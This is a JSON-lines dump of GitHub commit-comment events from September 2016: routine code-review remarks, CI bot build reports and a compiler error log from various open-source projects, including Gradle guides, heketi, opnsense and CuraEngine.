{"id":"4561063568","type":"CommitCommentEvent","actor":{"login":"cmbant"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":19015746,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-14T10:15:52Z","updated_at":"2016-09-14T10:15:52Z","body":"If it's only a problem with ihm=1, presumably this does not affect the default live code? Also suggests it may be just to do with threaded IO; on the other hand ihm doesn't seem to switch on any IO inside OMP loops, so I don't see why that would be. Probably the only thing to track it down is to keep commenting out ihm=1 lines until the offending line(s) is/are identified."}},"created_at":"2016-09-14T10:15:52Z"}
{"id":"4561068733","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015762,"position":18,"line":17,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:17:02Z","updated_at":"2016-09-14T10:17:02Z","body":"I didn't see this and other comments until very late in the review process. Mainly because I look at the rendered HTML first, trying to experience things like a user would.\r\n\r\nIn general, I'm leery of comments in these guides because they create the false impression that something will be done with them, and what's likely is that nothing will. Furthermore, they risk being left in place even when we deliver, basically creating a broken window situation.\r\n\r\nInstead of comments, let's try to capture these sorts of things as GFM checkboxes in the Guide issue and / or by adding dedicated cards to the board.\r\n\r\nIn this particular case, there is already a card on the board for this (Getting Started Installing Gradle), and the idea is that when that guide is complete, we'll swap in links to it in all the other guides instead of sending them to the user manual link seen above."}},"created_at":"2016-09-14T10:17:02Z"}
{"id":"4561070054","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"Seldaek/signal-handler"},"payload":{"comment":{"id":19015766,"position":null,"line":null,"path":null,"commit_id":"42c3274aa533dbc7315943de66bead42b7b85476","created_at":"2016-09-14T10:17:19Z","updated_at":"2016-09-14T10:17:19Z","body":"is this \"just a perf\" related thing or does it buy you also other stuff?"}},"created_at":"2016-09-14T10:17:19Z"}
{"id":"4561072782","type":"CommitCommentEvent","actor":{"login":"Laizerox"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19015773,"position":null,"line":null,"path":null,"commit_id":"8dc19ac21d1d8a33a53fee873e7d19a153ea8a67","created_at":"2016-09-14T10:17:54Z","updated_at":"2016-09-14T10:17:54Z","body":"@cyberium fair enough, I was just pointing such thing exist. However instead of doing casts everywhere we should probably move towards functions that return converted object?\r\n\r\nIt  has been discussed alot but no one done it yet.\r\n`static_cast<Pet*>(object)->method();`\r\n`object->toPet()->method();`\r\n`object->convert<Pet*>()->method();`\r\n\r\nPick your method :)"}},"created_at":"2016-09-14T10:17:54Z"}
{"id":"4561075231","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015787,"position":27,"line":27,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:18:26Z","updated_at":"2016-09-14T10:18:26Z","body":"I'm assuming this `TIP` was an accidental omission? Looks consistent with the kind of stuff we've been doing sidebars for elsewhere.\r\n\r\nbtw, prior to reviewing this guide, I didn't know about this single-line admonition syntax, thanks!"}},"created_at":"2016-09-14T10:18:26Z"}
{"id":"4561076268","type":"CommitCommentEvent","actor":{"login":"simogasp"},"repo":{"name":"poparteu/openMVG"},"payload":{"comment":{"id":19015789,"position":null,"line":null,"path":null,"commit_id":"fe5ac76ff9e2ae4cf57a4add171587a0432c4013","created_at":"2016-09-14T10:18:39Z","updated_at":"2016-09-14T10:18:39Z","body":"@fabiencastan can we delete this branch? it seems to be very outdated"}},"created_at":"2016-09-14T10:18:39Z"}
{"id":"4561080374","type":"CommitCommentEvent","actor":{"login":"morteza-binary"},"repo":{"name":"binary-com/mobile"},"payload":{"comment":{"id":19015801,"position":13,"line":111,"path":"www/js/pages/new-real-account-opening/components/new-account-maltainvest/new-account-maltainvest.controller.js","commit_id":"6d955cb0e8a36f292f2f58cf170097e028aa35c7","created_at":"2016-09-14T10:19:34Z","updated_at":"2016-09-14T10:19:34Z","body":"when you use $rootScope in controller you're using the main root that is parent of all scopes"}},"created_at":"2016-09-14T10:19:34Z"}
{"id":"4561082237","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":19015806,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-14T10:19:59Z","updated_at":"2016-09-14T10:19:59Z","body":"@qiaozhanrong 里面的文件本来就是忽略的啊"}},"created_at":"2016-09-14T10:19:59Z"}
{"id":"4561082632","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19015809,"position":41,"line":41,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T10:20:04Z","updated_at":"2016-09-14T10:20:04Z","body":"@fichtner we can change this easily https://github.com/opnsense/ports/blob/master/opnsense/opnsense-pam-auth/opnsense-pam-auth.c#L81 there is no standard way here.... we need some kind of interaction, I thought sending a property=value blob was just practical. "}},"created_at":"2016-09-14T10:20:04Z"}
{"id":"4561085650","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19015815,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T10:20:42Z","updated_at":"2016-09-14T10:20:42Z","body":"@snicolet I just seeing that there are effectively such calls, very strange... I have to investigate."}},"created_at":"2016-09-14T10:20:42Z"}
{"id":"4561090981","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19015841,"position":46,"line":46,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T10:21:53Z","updated_at":"2016-09-14T10:21:53Z","body":"@fichtner password= would also return 2, but if it would return 1 it's also ok, both result in an empty password (which receives not authenticated)."}},"created_at":"2016-09-14T10:21:53Z"}
{"id":"4561095696","type":"CommitCommentEvent","actor":{"login":"nickverse"},"repo":{"name":"CyanogenMod/android_system_core"},"payload":{"comment":{"id":19015851,"position":null,"line":null,"path":null,"commit_id":"2cdbe550a6739966b0237a27e4660169a59f2662","created_at":"2016-09-14T10:22:55Z","updated_at":"2016-09-14T10:22:55Z","body":"I'm getting errors when compiling **external/mm-dash/libdashplayer** with this cherry-picked commit guys!\r\nHope that I will help bring up the solution to this. DashPlayer in needed in msm8916, so I can't build right now.\r\n\r\nThe error is below:\r\n\r\n`target thumb C++: libdashplayer <= external/mm-dash/dashplayer/DashPlayer.cpp\r\nexternal/mm-dash/dashplayer/DashPlayer.cpp: In member function 'android::status_t android::DashPlayer::setParameter(int, const android::Parcel&)':\r\nexternal/mm-dash/dashplayer/DashPlayer.cpp:2042:45: error: too few arguments to function 'void utf16_to_utf8(const char16_t*, size_t, char*, size_t)'\r\n         utf16_to_utf8(str, len, (char*) data);\r\n                                             ^\r\nIn file included from system/core/include/utils/String8.h:22:0,\r\n                 from frameworks/av/include/media/MediaPlayerInterface.h:27,\r\n                 from external/mm-dash/dashplayer/DashPlayer.h:22,\r\n                 from external/mm-dash/dashplayer/DashPlayer.cpp:27:\r\nsystem/core/include/utils/Unicode.h:118:6: note: declared here\r\n void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst, size_t dst_len);\r\n      ^\r\nmake: *** [/home/nick/cm_12_1/out/target/product/j5nltexx/obj/SHARED_LIBRARIES/libdashplayer_intermediates/DashPlayer.o] Error 1`"}},"created_at":"2016-09-14T10:22:55Z"}
{"id":"4561097505","type":"CommitCommentEvent","actor":{"login":"albertmenglongli"},"repo":{"name":"albertmenglongli/Algorithms"},"payload":{"comment":{"id":19015857,"position":null,"line":null,"path":null,"commit_id":"8b401ccb13ba646904c55172d26376e2743a5113","created_at":"2016-09-14T10:23:20Z","updated_at":"2016-09-14T10:23:20Z","body":"For details, check https://discuss.leetcode.com/topic/58831/python-codes-with-6-lines"}},"created_at":"2016-09-14T10:23:20Z"}
{"id":"4561098159","type":"CommitCommentEvent","actor":{"login":"obnoxxx"},"repo":{"name":"raghavendra-talur/heketi"},"payload":{"comment":{"id":19015861,"position":7,"line":182,"path":"client/api/go-client/node.go","commit_id":"7c568db82494cdf94c7d69546ac2f36114316479","created_at":"2016-09-14T10:23:29Z","updated_at":"2016-09-14T10:23:29Z","body":"superfluous comment, imho. code says it all\r\n"}},"created_at":"2016-09-14T10:23:29Z"}
{"id":"4561099420","type":"CommitCommentEvent","actor":{"login":"obnoxxx"},"repo":{"name":"raghavendra-talur/heketi"},"payload":{"comment":{"id":19015866,"position":13,"line":188,"path":"client/api/go-client/node.go","commit_id":"7c568db82494cdf94c7d69546ac2f36114316479","created_at":"2016-09-14T10:23:45Z","updated_at":"2016-09-14T10:23:45Z","body":"superfluous comment, code says it all"}},"created_at":"2016-09-14T10:23:45Z"}
{"id":"4561100225","type":"CommitCommentEvent","actor":{"login":"obnoxxx"},"repo":{"name":"raghavendra-talur/heketi"},"payload":{"comment":{"id":19015869,"position":28,"line":203,"path":"client/api/go-client/node.go","commit_id":"7c568db82494cdf94c7d69546ac2f36114316479","created_at":"2016-09-14T10:23:56Z","updated_at":"2016-09-14T10:23:56Z","body":"superfluous comment"}},"created_at":"2016-09-14T10:23:56Z"}
{"id":"4561102504","type":"CommitCommentEvent","actor":{"login":"obnoxxx"},"repo":{"name":"raghavendra-talur/heketi"},"payload":{"comment":{"id":19015876,"position":26,"line":225,"path":"client/cli/go/cmds/node.go","commit_id":"7c568db82494cdf94c7d69546ac2f36114316479","created_at":"2016-09-14T10:24:28Z","updated_at":"2016-09-14T10:24:28Z","body":"superfluous comment"}},"created_at":"2016-09-14T10:24:28Z"}
{"id":"4561106390","type":"CommitCommentEvent","actor":{"login":"snazzarov"},"repo":{"name":"snazzarov/tutu"},"payload":{"comment":{"id":19015889,"position":1,"line":1,"path":".idea/runConfigurations/Development__tutu.xml","commit_id":"829497d92f9910bc6b794b64c85d2c8d51e21ee4","created_at":"2016-09-14T10:25:18Z","updated_at":"2016-09-14T10:25:18Z","body":"Чем лучше пользоваться для RoR-разработки -- RubyMine или Sublime ?\r\n\r\n2016-09-14 12:52 GMT+03:00 vkurennov <notifications@github.com>:\r\n\r\n> Папку .ideа удали из репозитория и добавь в .gitignore, чтобы она больше\r\n> не попадала сюда. Эта папка хранит настройки RubyMine, а если говорить о\r\n> командной разработке, то эти настройки могут быть разными у разных\r\n> разработчиков. Поэтому все, что специфично для конкретного разработчика, по\r\n> хорошему, не должно присутствовать в репо.\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/snazzarov/tutu/commit/829497d92f9910bc6b794b64c85d2c8d51e21ee4#commitcomment-19015421>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/APDhQzDocZIDepOfKa6cVUMWXh0GVNbxks5qp8P2gaJpZM4J8l70>\r\n> .\r\n>\r\n\r\n\r\n\r\n-- \r\nС уважением, Назаров С.\r\n"}},"created_at":"2016-09-14T10:25:18Z"}
{"id":"4561111485","type":"CommitCommentEvent","actor":{"login":"Adram"},"repo":{"name":"Adram/sddm_cloc"},"payload":{"comment":{"id":19015895,"position":null,"line":null,"path":null,"commit_id":"185ab49f3ea7ac88f3129a05a5c7d4c9c7106e59","created_at":"2016-09-14T10:26:27Z","updated_at":"2016-09-14T10:26:27Z","body":"Questo è un commento da web del commit"}},"created_at":"2016-09-14T10:26:27Z"}
{"id":"4561112612","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015899,"position":34,"line":34,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:26:42Z","updated_at":"2016-09-14T10:26:42Z","body":"Every source listing should have a title like this, indicating the full path to the source.\r\n\r\nDoing this should largely eliminate the need to repeat these paths in prose as is done on line 31.\r\n\r\nThis is also one for the style guide. How code blocks should be written. I just checked, and didn't see an entry for this. I thought we had captured some of this somewhere, though. Especially about using titles for listings and using language names explicitly e.g. `[source,java]`."}},"created_at":"2016-09-14T10:26:42Z"}
{"id":"4561112984","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19015903,"position":null,"line":null,"path":null,"commit_id":"154e026fbe6e53037e46a8c30f2b837459235acc","created_at":"2016-09-14T10:26:47Z","updated_at":"2016-09-14T10:26:47Z","body":":)"}},"created_at":"2016-09-14T10:26:47Z"}
{"id":"4561115039","type":"CommitCommentEvent","actor":{"login":"obnoxxx"},"repo":{"name":"raghavendra-talur/heketi"},"payload":{"comment":{"id":19015907,"position":12,"line":44,"path":"client/cli/go/cmds/node.go","commit_id":"7c568db82494cdf94c7d69546ac2f36114316479","created_at":"2016-09-14T10:27:15Z","updated_at":"2016-09-14T10:27:15Z","body":"Do we want to add nodeListCommand.SilenceUsage = true below?"}},"created_at":"2016-09-14T10:27:15Z"}
{"id":"4561120085","type":"CommitCommentEvent","actor":{"login":"mahmttt"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19015919,"position":null,"line":null,"path":null,"commit_id":"05daaec6be5b4f691fd5813f96ec85c33460633e","created_at":"2016-09-14T10:28:21Z","updated_at":"2016-09-14T10:28:21Z","body":"The latest version of that (1.1.5.1) does not use? Let's use the Is"}},"created_at":"2016-09-14T10:28:21Z"}
{"id":"4561122458","type":"CommitCommentEvent","actor":{"login":"mahmttt"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19015927,"position":null,"line":null,"path":null,"commit_id":"27518a61daa7e697b29cb1c517079c4fea37975e","created_at":"2016-09-14T10:28:54Z","updated_at":"2016-09-14T10:28:54Z","body":"The latest version of that (1.1.5.1) does not use? Let's use the Is\r\n"}},"created_at":"2016-09-14T10:28:54Z"}
{"id":"4561124285","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015946,"position":40,"line":40,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:29:20Z","updated_at":"2016-09-14T10:29:20Z","body":"Partially, this is to make understanding what's being worked with more explicit. Previously, `extensions` just felt kind of magical.\r\n\r\nIt's also to allow us to remove `final` from the `Project` method parameter, and to  generally make the code for the plugin shorter. More comments below."}},"created_at":"2016-09-14T10:29:20Z"}
{"id":"4561126623","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015965,"position":43,"line":43,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:29:52Z","updated_at":"2016-09-14T10:29:52Z","body":"`Project` no longer needs to be final now. Only the `ExtensionContainer`"}},"created_at":"2016-09-14T10:29:52Z"}
{"id":"4561126628","type":"CommitCommentEvent","actor":{"login":"thomasjo"},"repo":{"name":"thomasjo/atom-latex"},"payload":{"comment":{"id":19015966,"position":null,"line":null,"path":null,"commit_id":"12510bcf8683c526c1343e5452b0df455a3f151c","created_at":"2016-09-14T10:29:52Z","updated_at":"2016-09-14T10:29:52Z","body":"Beautiful 😍 "}},"created_at":"2016-09-14T10:29:52Z"}
{"id":"4561126775","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19015967,"position":50,"line":450,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T10:29:54Z","updated_at":"2016-09-14T10:29:54Z","body":"Remove commented code."}},"created_at":"2016-09-14T10:29:54Z"}
{"id":"4561129209","type":"CommitCommentEvent","actor":{"login":"alonsocamaro"},"repo":{"name":"richbrowne/f5-openstack-agent"},"payload":{"comment":{"id":19015975,"position":null,"line":null,"path":null,"commit_id":"8ebcfdc23efee104d8f0896e41131587df55fa12","created_at":"2016-09-14T10:30:26Z","updated_at":"2016-09-14T10:30:26Z","body":"Thanks Rich!\r\n\r\nI just tested it and it works fine with the exception of the following:\r\n\r\n```\r\nroot@node-2:/etc/init.d# /etc/init.d/f5-oslbaasv2-agent try-restart\r\nrestart: missing job name\r\nTry `restart --help' for more information.\r\n\r\n```\r\nBelow you have a more detailed output (sh -x)\r\n\r\nRegards\r\n\r\n     Ulises\r\n\r\n```\r\n[...] \r\n+ [ -r /etc/default/openstack ]\r\n+ [ -r /etc/default/f5-oslbaasv2-agent ]\r\n+ [ x = xyes ]\r\n+ [ x != xno ]\r\n+ DAEMON_ARGS= --config-file /etc/neutron/services/f5/f5-openstack-agent.ini --config-file /etc/neutron/neutron.conf --log-file=/var/log/neutron/f5-oslbaasv2-agent.log\r\n+ rh_status_q\r\n+ rh_status\r\n+ restart\r\nrestart: missing job name\r\nTry `restart --help' for more information.\r\n+ exit 1\r\n\r\n```"}},"created_at":"2016-09-14T10:30:26Z"}
{"id":"4561132099","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19015981,"position":null,"line":null,"path":null,"commit_id":"e295a74c52449df59f532f94270201a63eb9b75c","created_at":"2016-09-14T10:31:08Z","updated_at":"2016-09-14T10:31:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 991](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13224&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T10:31:08Z"}
{"id":"4561133459","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015983,"position":44,"line":44,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:31:25Z","updated_at":"2016-09-14T10:31:25Z","body":"I'm favoring repeating the string \"greeting\" below as I believe it helps educate the user about what's going on. Keeping things DRY is good practice for code you're writing for real, but the additional abstraction of a variable can actually get in the way when you're just trying to communicate fundamentals. Eliminating this line also makes the overall plugin source smaller, which is a good thing for first impressions."}},"created_at":"2016-09-14T10:31:25Z"}
{"id":"4561134480","type":"CommitCommentEvent","actor":{"login":"simogasp"},"repo":{"name":"poparteu/openMVG"},"payload":{"comment":{"id":19015990,"position":null,"line":null,"path":null,"commit_id":"31fbeef21d3d05ad136030e6ff6b2d4564b44500","created_at":"2016-09-14T10:31:39Z","updated_at":"2016-09-14T10:31:39Z","body":"@fabiencastan this is the only commit of the branch that has not been merged. On the other hand there is now a similar thing in ConvertSfmData https://github.com/poparteu/openMVG/blob/popart_develop/src/software/SfM/main_ConvertSfM_DataFormat.cpp#L70\r\nThe difference is that it creates symlinks instead of renaming the files\r\n"}},"created_at":"2016-09-14T10:31:39Z"}
{"id":"4561138436","type":"CommitCommentEvent","actor":{"login":"iurevych"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19015997,"position":5,"line":33,"path":"source/saas.rst","commit_id":"356ae6e6d196adf935070c54e2af2c134e60b0cb","created_at":"2016-09-14T10:32:33Z","updated_at":"2016-09-14T10:32:33Z","body":"I was under impression that a category as a term means plural since it acts as a stack of data which is plural by nature. If you disagree with me you can always change it to singular."}},"created_at":"2016-09-14T10:32:33Z"}
{"id":"4561142315","type":"CommitCommentEvent","actor":{"login":"LcTrKiD"},"repo":{"name":"HackLab-Almeria/hacklab-almeria.github.io"},"payload":{"comment":{"id":19016004,"position":null,"line":null,"path":null,"commit_id":"539944ce60829d8262534bd0814a065509fbff2c","created_at":"2016-09-14T10:33:29Z","updated_at":"2016-09-14T10:33:29Z","body":"Very gracias!"}},"created_at":"2016-09-14T10:33:29Z"}
{"id":"4561144890","type":"CommitCommentEvent","actor":{"login":"bogdan"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19016009,"position":5,"line":33,"path":"source/saas.rst","commit_id":"356ae6e6d196adf935070c54e2af2c134e60b0cb","created_at":"2016-09-14T10:34:04Z","updated_at":"2016-09-14T10:34:04Z","body":"In this way `purchase` should be plural too, but it is not.\n\n2016-09-14 13:32 GMT+03:00 iurevych <notifications@github.com>:\n\n> I was under impression that a category as a term means plural since it\n> acts as a stack of data which is plural by nature. If you disagree with me\n> you can always change it to singular.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/talkable/talkable-docs/commit/356ae6e6d196adf935070c54e2af2c134e60b0cb#commitcomment-19015997>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHeRIAiCZ09xk5PW69Or0EI3wjCKfWJks5qp81CgaJpZM4J8l4A>\n> .\n>\n\n\n\n-- \nBogdan Gusiev.\nagresso@gmail.com\n"}},"created_at":"2016-09-14T10:34:04Z"}
{"id":"4561144937","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19016010,"position":null,"line":null,"path":null,"commit_id":"8dc4bfca7435b5b65be4af7fb657e80ac328cd63","created_at":"2016-09-14T10:34:05Z","updated_at":"2016-09-14T10:34:05Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2306 of 2469 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dc4bfca7435b5b65be4af7fb657e80ac328cd63-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dc4bfca7435b5b65be4af7fb657e80ac328cd63-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.4%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T10:34:05Z"}
{"id":"4561146216","type":"CommitCommentEvent","actor":{"login":"haya14busa"},"repo":{"name":"mattn/goveralls"},"payload":{"comment":{"id":19016012,"position":null,"line":null,"path":null,"commit_id":"95d507be9466c3bdca29381b8911ab42d130b2b3","created_at":"2016-09-14T10:34:22Z","updated_at":"2016-09-14T10:34:22Z","body":"...! :+1:"}},"created_at":"2016-09-14T10:34:22Z"}
{"id":"4561148323","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016015,"position":52,"line":48,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:34:51Z","updated_at":"2016-09-14T10:34:51Z","body":"I found a bummer of an issue about Asciidoctor today. Asciidoctor's CSS prevents the (1), (2) callout numbers from being copied, which is great, but it does _not_ prevent the whitespace between the last character of code and the first character of the callout from being copied. This means that when you paste the code, you end up with nasty trailing whitespace :(\r\n\r\nPerhaps we can fix this on our own by further hacking the CSS (@eriwen?). If so, we can add an issue for this and forget about it for now.\r\n\r\nBut in the process of discovering all this, I figured it would be good to standardize on the right margin for aligning these callouts in the code. Unless the line of code itself is longer than 80 chars, let's try to have callouts right-aligned on the 80-char margin. That is, bumping up against the margin but not going over."}},"created_at":"2016-09-14T10:34:51Z"}
{"id":"4561148578","type":"CommitCommentEvent","actor":{"login":"isimluk"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19016017,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-14T10:34:55Z","updated_at":"2016-09-14T10:34:55Z","body":"I will fix that, sorry for inconvenience.\r\n\r\nLet me see if we can avoid `*`. That would incorrectly match strings that start with `r`."}},"created_at":"2016-09-14T10:34:55Z"}
{"id":"4561149071","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19016018,"position":67,"line":467,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T10:35:02Z","updated_at":"2016-09-14T10:35:02Z","body":"This computation is magic to me. Documentation?"}},"created_at":"2016-09-14T10:35:02Z"}
{"id":"4561150590","type":"CommitCommentEvent","actor":{"login":"iurevych"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19016022,"position":5,"line":33,"path":"source/saas.rst","commit_id":"356ae6e6d196adf935070c54e2af2c134e60b0cb","created_at":"2016-09-14T10:35:22Z","updated_at":"2016-09-14T10:35:22Z","body":"I agree that `purchase` should be in plural. I vote for plural everywhere which might be impossible to do due to legacy reasons."}},"created_at":"2016-09-14T10:35:22Z"}
{"id":"4561158381","type":"CommitCommentEvent","actor":{"login":"olea"},"repo":{"name":"HackLab-Almeria/hacklab-almeria.github.io"},"payload":{"comment":{"id":19016039,"position":null,"line":null,"path":null,"commit_id":"539944ce60829d8262534bd0814a065509fbff2c","created_at":"2016-09-14T10:37:09Z","updated_at":"2016-09-14T10:37:09Z","body":"> Very gracias!\r\n\r\nhttps://imgur.com/gallery/vd0ADYj"}},"created_at":"2016-09-14T10:37:09Z"}
{"id":"4561159668","type":"CommitCommentEvent","actor":{"login":"paulraysmile"},"repo":{"name":"paulraysmile/backup"},"payload":{"comment":{"id":19016044,"position":null,"line":null,"path":null,"commit_id":"1798320c4956051f2b2a819c93da8099f562cf9f","created_at":"2016-09-14T10:37:27Z","updated_at":"2016-09-14T10:37:27Z","body":"Hi,this is PaulRay in China and do i know u "}},"created_at":"2016-09-14T10:37:27Z"}
{"id":"4561159808","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19016046,"position":null,"line":null,"path":null,"commit_id":"02e56d08f17b7181b2069ef2f595fac1b13f813b","created_at":"2016-09-14T10:37:30Z","updated_at":"2016-09-14T10:37:30Z","body":"My intention is to put some of the blame of you for possibly overtesting, Stéphane :-D"}},"created_at":"2016-09-14T10:37:30Z"}
{"id":"4561160790","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19016048,"position":null,"line":null,"path":null,"commit_id":"fd626d203a3704c9c85350e3e5d30d2245f771a2","created_at":"2016-09-14T10:37:43Z","updated_at":"2016-09-14T10:37:43Z","body":"os_2.0_develop_signal_slot_bug (mbadams5) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fd626d203a3704c9c85350e3e5d30d2245f771a2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fd626d203a3704c9c85350e3e5d30d2245f771a2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T10:37:43Z"}
{"id":"4561160922","type":"CommitCommentEvent","actor":{"login":"joozek78"},"repo":{"name":"PuppetJs/PuppetJs"},"payload":{"comment":{"id":19016049,"position":14,"line":493,"path":"src/puppet.js","commit_id":"47cb56afa0c8611254ad72a04a3d707c6551e760","created_at":"2016-09-14T10:37:45Z","updated_at":"2016-09-14T10:37:45Z","body":"Yeah, it seems that it all boils down to `function establish`"}},"created_at":"2016-09-14T10:37:45Z"}
{"id":"4561162551","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19016054,"position":141,"line":199,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-14T10:38:11Z","updated_at":"2016-09-14T10:38:11Z","body":"I think the part about RESET would be helpful,  could you add it?"}},"created_at":"2016-09-14T10:38:11Z"}
{"id":"4561163991","type":"CommitCommentEvent","actor":{"login":"EWattman"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19016060,"position":null,"line":null,"path":null,"commit_id":"e9bd9a18a60780e5294a7987328fac6a8ad1fece","created_at":"2016-09-14T10:38:30Z","updated_at":"2016-09-14T10:38:30Z","body":"Indeed you did"}},"created_at":"2016-09-14T10:38:30Z"}
